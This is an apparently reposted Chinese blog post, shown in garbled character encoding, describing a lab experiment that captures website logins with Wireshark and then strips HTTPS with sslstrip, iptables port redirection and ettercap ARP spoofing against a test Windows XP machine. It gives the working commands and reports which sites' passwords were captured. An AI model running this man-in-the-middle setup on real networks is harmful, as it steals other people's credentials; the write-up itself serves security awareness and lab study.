免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼-創(chuàng)新互聯(lián)

因?qū)懥艘欢挝淖郑陀羞@個(gè)抓包實(shí)驗(yàn)

成都網(wǎng)站建設(shè)哪家好，找成都創(chuàng)新互聯(lián)公司！專(zhuān)注于網(wǎng)頁(yè)設(shè)計(jì)、重慶網(wǎng)站建設(shè)公司、微信開(kāi)發(fā)、微信平臺(tái)小程序開(kāi)發(fā)、集團(tuán)企業(yè)網(wǎng)站設(shè)計(jì)等服務(wù)項(xiàng)目。核心團(tuán)隊(duì)均擁有互聯(lián)網(wǎng)行業(yè)多年經(jīng)驗(yàn)，服務(wù)眾多知名企業(yè)客戶(hù)；涵蓋的客戶(hù)類(lèi)型包括：集裝箱等眾多領(lǐng)域，積累了大量豐富的經(jīng)驗(yàn)，同時(shí)也獲得了客戶(hù)的一致表?yè)P(yáng)！

--------------------------------

話(huà)說(shuō)：“現(xiàn)在我們一到某處，第一件事便是問(wèn)有沒(méi)有WiFi”。WiFi成為當(dāng)下的熱門(mén)，在公共場(chǎng)合人們最喜歡免費(fèi)WiFi。但用著用著后不覺(jué)QQ被盜了。這WiFi便是誘餌，釣魚(yú)人設(shè)了一個(gè)局，我們以為撿到便宜了，須不知，我們上勾了。QQ被盜，郵箱被瀏覽等等。免費(fèi)雖好，請(qǐng)謹(jǐn)慎。

---------------------------------------

1.利用wireshark抓包測(cè)試51cto帳戶(hù)及密碼

環(huán)境的搭建

網(wǎng)絡(luò)環(huán)境：網(wǎng)關(guān)：192.168.199.1；

測(cè)試主機(jī)：192.168.199.101，ubuntu13.04/wireshark；

測(cè)試目標(biāo)：51cto.com

步驟

 a.ubuntu 13.04安裝wireshark

   sudo apt-get wireshark

 b. 新建wireshark組把普通用戶(hù)加入其中，給wireshark使用權(quán)限

   sudo groupadd wireshark //加組wireshark

    sudo gpasswd -a zozlin wireshark //向組 GROUP 中添加用戶(hù) USER

   sudo chgrp wireshark /usr/bin/dumpcap // 更抓包文件改組

    sudo chmod 4755 /usr/bin/dumpcap //可執(zhí)行權(quán)限

   錯(cuò)誤：

       解決方法：sudo gedit /usr/share/wireshark/init.lua

倒數(shù)第二行原來(lái)為：dofile(DATA_DIR.."console.lua")改為--dofile(DATA_DIR.."console.lua")

 c. sudo wireshark  選擇網(wǎng)卡（在本機(jī)測(cè)試）

定過(guò)濾規(guī)則

ip.src==192.168.199.100  && http  （源地址及http協(xié)議）

重點(diǎn) （post application/x-www-form-urllencoded）

先試試天涯論壇和163郵件的密碼，ssl己加密傳輸了。后51cto 發(fā)現(xiàn)是明文帳號(hào)密碼

-----------------------------------------

2.利用sslstrip和ettercap突破ssl嗅探密碼

環(huán)境的搭建

網(wǎng)絡(luò)環(huán)境：網(wǎng)關(guān)：192.168.199.1；

***主機(jī)：192.168.199.101，ubuntu13.04/wireshark/sslstrip；

被***主機(jī)：192.168.199.105/103，虛擬機(jī)Windowsxp，IE6；

測(cè)試目標(biāo)：51cto.com  mail.163.com  tianya.cn  baidu.com

步驟

下載

http://www.thoughtcrime.org/software/sslstrip/

 解壓

 tar -zxvf sslstrip-0.9.tar.gz

 安裝

 sslstrip python setup.py install

打開(kāi)ip_forword轉(zhuǎn)發(fā)

 echo “1”>/proc/sys/net/ipv4/ip_forward

使用Iptables過(guò)濾數(shù)據(jù)包  //通過(guò)iptables 把所有http數(shù)據(jù)導(dǎo)入到10000端口，我們用sslstrip監(jiān)聽(tīng)10000端口，并得到我們想要的數(shù)據(jù)

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

sslstrip -l 10000

利用ettercap進(jìn)行arp欺騙

ettercap –T –q –M arp:remote /192.168.199.103/ /192.168.199.1/

成果

mail.163.com  51cto.com   破

baidu.com   密碼再次加密了

tianya.cn  未破

參考1.http://www.freebuf.com/articles/web/5929.html

    2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html

   3.http://www.linuxde.net/2011/11/2522.html

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線(xiàn)，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性?xún)r(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專(zhuān)為企業(yè)上云打造定制，能夠滿(mǎn)足用戶(hù)豐富、多元化的應(yīng)用場(chǎng)景需求。

網(wǎng)頁(yè)題目：免費(fèi)WiFi,wireshark抓包及sslstrip抓密碼-創(chuàng)新互聯(lián)
文章網(wǎng)址：http://m.kartarina.com/article40/eggho.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供響應(yīng)式網(wǎng)站、網(wǎng)站建設(shè)、品牌網(wǎng)站建設(shè)、自適應(yīng)網(wǎng)站、建站公司、網(wǎng)站制作

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話(huà)：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)